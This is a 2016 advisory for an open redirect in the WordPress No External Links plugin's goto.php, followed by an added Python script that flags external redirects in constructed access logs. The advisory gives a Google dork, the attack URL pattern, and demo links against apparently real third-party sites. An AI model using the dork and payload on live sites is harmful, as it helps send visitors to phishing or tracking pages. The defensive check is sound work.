WordPress No External Links 2.6.3 / 2.7.1 Open Redirect
Posted on 14 January 2016
Exploit Title : WordPress No External Links Plugin Open Redirect
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : https://wordpress.org/plugins/wp-noexternallinks/
Google Dork : "inurl:wp-content/plugins/wp-noexternallinks/goto.php"
Version : 2.7.1 & 2.6.3
Date : 13 Jan 2016
Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel

Vulnerable PHP File = wp-noexternallinks/goto.php
Vulnerable Parameter = GET method (the raw query string is used as the redirect destination)

By using this vulnerability you can redirect your victim to any page you want, for example to a malicious PHP page that steals the visitor's IP address.

Attack Like : site.com/wp-content/plugins/wp-noexternallinks/goto.php?google.com

Demos :

http://prazhanka.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org

http://dance-code.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org

http://realix.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org

http://headz.fm/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org

http://stupnitskaya.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org

Discovered by : Ac!D
tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for vendetta , Sh.Cloner & Hassan
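From the defender's side, the advisory gives two facts worth turning into a check: the redirect destination is the raw query string of goto.php, and a destination is abusive exactly when it resolves to a host other than the site's own. The script below is an added example, not code from the advisory or from the plugin. It scans constructed Apache-style access-log lines for goto.php requests whose destination is an external host, using the same host comparison a fixed goto.php would have to make before issuing a Location header. The log lines, the site host "site.example" and the IP addresses are all made up for the example; the goto.php path is the one named in the advisory.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample log lines (Apache combined format); hosts and IPs are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jan/2016:10:01:02 +0000] "GET /wp-content/plugins/wp-noexternallinks/goto.php?google.com HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jan/2016:10:01:03 +0000] "GET /wp-content/plugins/wp-noexternallinks/goto.php?http%3A%2F%2Fexample.org%2Fpage HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jan/2016:10:02:00 +0000] "GET /wp-content/plugins/wp-noexternallinks/goto.php?http://site.example/about HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jan/2016:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

GOTO_PATH = "/wp-noexternallinks/goto.php"   # path from the advisory
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*://")


def redirect_target(request_path):
    """Return the decoded redirect destination of a goto.php request, or None
    if the request is for some other script or carries no query string."""
    path, sep, query = request_path.partition("?")
    if not sep or not path.endswith(GOTO_PATH):
        return None
    return unquote(query)


def target_host(target):
    """Host a browser would be sent to for this destination, lowercased.
    Destinations without a scheme (the advisory's goto.php?google.com shape)
    and protocol-relative ones (//host) are both treated as absolute; a plain
    path-only destination (/page) returns None because it stays on-site."""
    t = target.strip()
    if t.startswith("//"):
        t = "http:" + t
    elif t.startswith("/"):
        return None
    elif not SCHEME_RE.match(t):
        t = "http://" + t
    host = urlsplit(t).hostname   # hostname drops userinfo and port
    return host.lower() if host else None


def is_allowed_target(target, site_host, allowlist=()):
    """The check a safe redirector performs: on-site or explicitly allowlisted."""
    host = target_host(target)
    if host is None:
        return True
    return host == site_host.lower() or host in {h.lower() for h in allowlist}


def find_external_redirects(log_text, site_host, allowlist=()):
    """Return (client_ip, raw_target, target_host) for every goto.php request
    whose destination would leave the site."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = redirect_target(m.group("path"))
        if target is None or is_allowed_target(target, site_host, allowlist):
            continue
        hits.append((line.split()[0], target, target_host(target)))
    return hits


if __name__ == "__main__":
    for ip, target, host in find_external_redirects(SAMPLE_LOG, "site.example"):
        print(f"{ip} -> external redirect to {host} via {target!r}")
```

The host comparison uses urlsplit's hostname so that userinfo, ports and percent-encoding do not change the outcome; the same is_allowed_target logic, dropped in front of the Location header, is what removes the open redirect, with an allowlist covering any external destinations the site genuinely needs.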